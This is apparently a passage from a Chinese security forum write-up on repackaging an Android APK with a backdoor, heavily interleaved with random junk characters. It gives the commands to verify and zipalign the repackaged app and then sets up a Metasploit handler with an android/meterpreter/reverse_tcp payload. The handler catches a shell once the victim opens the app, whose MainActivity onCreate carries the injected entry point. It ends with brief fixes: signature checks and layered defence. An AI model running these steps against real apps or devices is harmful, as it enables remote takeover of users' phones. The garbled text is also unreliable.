- H( g' P7 E7 w8 t/ w7 [ 7 R1 |( C$ D( P% F% J. A! J! z. m7 ~ apksigner verify -v --print-certs repackaged.apk ( F' P9 J8 t9 c8 S; R5 O/ o% d ; e' K8 {& O7 z* I" Z

, y Y( d' y1 A D7 R: ~, { : X7 ?' Z. Z% s, F keytool方式 ' b0 }) F5 L! _0 Y5 F4 u& u4 D* b ; y5 P4 ~9 q6 ]/ B, S) \. }! V

+ i2 P$ _' |. k/ f, V+ { / {, D- H% G: L+ V keytool -printcert -jarfile repackaged.apk - T Y2 _, P% u9 s& R . J3 b" d. n+ r; p+ n

, ?: ?/ a0 O& S, x9 s/ s ; f9 o& d6 n/ v7 ? 对齐 [3 B/ ~1 ~, y% o3 Z7 p6 k6 j

, o" A m7 k) b - ^% ^: Z7 w- p* A1 I ]" s 字节对齐优化 ' e7 `4 f; Y/ b# V: q . j& P+ J1 v7 ~! L' n

+ S5 [+ U3 q+ S) O1 q3 S2 Y - \" ?, l" h+ f7 T8 V4 U zipalign -v 4 repackaged.apk final.apk 0 j, D: ^7 e7 T- d 5 ^9 @7 k& a2 s

: K3 f# J# A5 y* c D5 n+ a& {& W 检查是否对齐 , @$ h# X% O3 N8 C 4 M! L* h2 |3 H% a& a3 z8 j

& f1 N, N! s. ]% X% ~4 @3 y7 | . D" j" Z: y4 W' G, l zipalign -c -v 4 final.apk 1 e- @" t0 Y h: C2 i3 Z ( s& e# s3 S' G/ ^- v

7 B) k4 i8 k' n& I $ F, K5 k4 q0 l' i+ X) ^ 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 ) I3 T- r5 H1 p : I: o0 b; e% J$ s

$ K/ p6 I a/ ?# `0 `- k2 ?- G+ l2 g9 ` 启动Metasploit控制台，配置参数等待上线 8 c' o/ Q; e [1 A0 `2 Y9 o7 j # {* s. v+ H; o# {0 h" \5 m" b4 h

, Q* e1 q* \# ^% a7 ~ 6 B" \. N8 o' V 在终端依次输入如下命令 # d# c- F: C) U* u' b H) z : y* S3 h6 Y4 O q" W" d9 I. K/ y

7 O# V( o' _6 H1 ~* D * U0 {' a! ^* q8 } msfconsole / X6 d" z. M" b7 Y % H/ ~, X# ~; P" s# j

* ~+ J# f4 F" C6 e! }6 {, R 5 a# v. H$ i! x use exploit/multi/handler # H7 N( [4 c! c: i5 D & F# d1 i/ A- C; p

2 j x6 O. D$ ]: y& j( K8 [ 0 | ^2 c2 C9 H! P set PAYLOAD android/meterpreter/reverse_tcp / U) n$ H6 L: S# e& f& C# n: [3 h

0 r: ^4 S7 z8 n" Q# H; y - _1 |' T+ u. D' u5 j set LHOST 192.xxx.xx.xx & ~4 Q$ z+ J" a$ U8 R" H r f 3 }* C- G( l# @0 v3 X$ ]7 X

: g! F3 X. K1 j3 v& P" ~ r; y$ E# D set LPORT 4444 9 n0 F7 H' r$ H. _$ U1 j) r* L ! }+ a* C7 i' W

% s4 ~1 N4 I- X% S $ A2 X+ s9 a4 o8 M8 |, j exploit 3 u2 I% Q( ?5 ]' K0 ?( T8 E# ^$ `

: h% I% O3 A# O) E: x0 i& l* Q% ?- W* c6 d: j 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 7 J3 a. R; {, d3 b+ g$ q) s [ / j% l0 x$ G, E* {

- J* P8 `2 x" g8 x$ y% i : a: B% a: j: p# J# @" ? f% j 漏洞危害：中 8 H G3 g9 L) J( [ z3 B/ S. K' W % n9 V( ~* b7 `9 B9 C

9 n. h1 j0 P8 y" V Z [7 k0 A4 `7 ^; c0 b0 r7 X / y1 Y V5 ] ^# `$ x % x! \' Y- ]* Z: o5 Z+ S: U 严重程度 9 C- v+ }( @! g1 U; q4 c8 T 0 X& o/ i6 I, S/ ?2 l' V / x5 D! K, d3 R7 e6 ?2 T 9 \* o9 C7 M6 _	5 b' ^$ s2 i3 U 5 n" P" p& w/ f1 j - `9 Q. K) c( Q6 o) V+ t 5 b$ R8 J. g- K: z1 y 高 6 F+ n* x, `9 N 2 q9 D5 y/ P) a0 i1 s 8 Q+ O8 S; L( M) a/ ]$ d( B( f& P/ t0 l5 X' f+ n	* F# E- f6 o0 ~( M + O1 h4 T$ v/ c* y) t . }$ }, d6 `! \|( X! p1 \|$ `/ E! k" U/ V3 _# T/ u ■ 4 @; f; t* V& b6 l3 G/ [ . Y4 O& Y* Z8 i, @# w ( z$ o8 B' N- e1 j: q; [, e1 V3 p4 y% ~0 Y9 l1 I) @	7 p3 U, b3 m% O! n; G , C$ i1 [ ]/ ~4 l ( C0 L( h9 Y$ d' E D+ t3 H: ~+ B2 G8 Y+ G4 R7 F 中 " G( Q3 H) h0 K- H' r) ^4 {. d* f& e; H( a" g ; M4 z) f) z* U: v2 C1 g/ q$ t& I; G+ ^' j( s! \|7 @1 n4 q, m	+ [- @6 c! g3 p& I , Q) s! [) r) M" U) K7 k 5 J% R/ M% g6 ?) e9 @ : z2 P* L( j+ t! L f, N 4 ] N6 z6 T9 K# m+ D, ] 4 @0 u& H) t" A# y - v2 w0 T/ f+ g$ [ " y. }4 N C! {" o( {" J! \|% ?1 F' K % T, Z. {) t) ?3 V" y & I* ]# j# j" E$ R: d6 r	! a4 ~2 D# h2 L, {8 { + h6 i+ H- t) f3 z 5 ]9 V- q' p0 Z6 }6 }4 Q ! ~+ N* ]3 s" a7 V: T 低 * C- q: b0 U# E: m% x ) ?! K3 ]' T+ K! K5 j) J $ V$ D8 o3 ^: O" v ' r3 u' ?& n4 l" }	% L) w. O6 _0 ^2 r' h% n7 E 1 e, R. l- N3 O/ Z7 O 0 L) d3 R0 T# b; W5 e6 s$ l" _- P 8 P* S/ X3 }' h+ R0 {+ k1 V* O 3 u# a; O* ~6 t: \|/ a: t! s3 ]$ m; o, ?) @ 7 Y% ?0 a8 k6 \- C3 ? g* U3 e ' l3 ?3 U V, v% v# s) E$ _ % k: _( K# h" p) M/ }4 k8 F$ ^: p+ D/ X! \|5 E

% L3 w; v+ O& W% p- o & k9 o, }7 n! e, U+ l. Y0 z " A! S% ^4 ^1 P1 p: q D- P9 ? 2 a+ x! f% H0 w W+ Q! w, [

# y5 @- f& U, [, ]$ s8 ^* d( [3 P1 U 修复方法： 4 ~# L) Y( _( V7 }5 V `4 K 0 f6 `7 n) v$ f% ?; d

+ n2 I2 V. ?" u5 i5 P8 t0 r # _( {1 v& [/ U" w) y$ g" K/ B% f: `2 H 1.在 APP 启动时应做签名校验防止二次打包。
0 _$ R0 z1 h' ~% K; ^2 W 6 x2 P: K. r, ~% L5 n; a/ y/ R( Q 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 $ x3 b6 g( q* q c, U* _9 t; W; I' ]: \# L

7 b4 T2 k4 s" N - h2 g# I; N. \# r+ V , p5 d1 Z4 D1 m& m, ?# \1 ?4 G% i' w# ~ t: p2 h

; t- o% N! X/ R! } \0 V, O7 e. X 0 o- L. |. r% T( D: i% q8 e7 E& v
' j$ k2 h1 z2 }% i; L8 ? 8 R& R U% |. N; Z% C2 ~

		自动登录	找回密码
密码			立即注册